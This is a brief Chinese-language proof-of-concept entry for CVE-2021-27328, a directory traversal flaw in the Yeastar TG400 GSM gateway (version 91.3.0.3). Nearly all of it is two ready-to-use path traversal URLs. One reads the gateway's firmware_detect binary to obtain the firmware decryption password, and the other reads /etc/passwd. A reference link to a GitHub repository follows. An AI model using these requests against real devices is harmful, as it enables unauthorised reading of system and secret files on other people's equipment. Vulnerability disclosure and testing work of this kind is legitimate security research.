朗视TG400 GSM 网关目录遍历 (CVE-2021-27328)¶

影响版本：

Yeastar TG400 GSM-91.3.0.3

PoC：

获取固件解密密码
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
/etc/passwd：
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd

ref：

https://github.com/SQSamir/CVE-2021-27328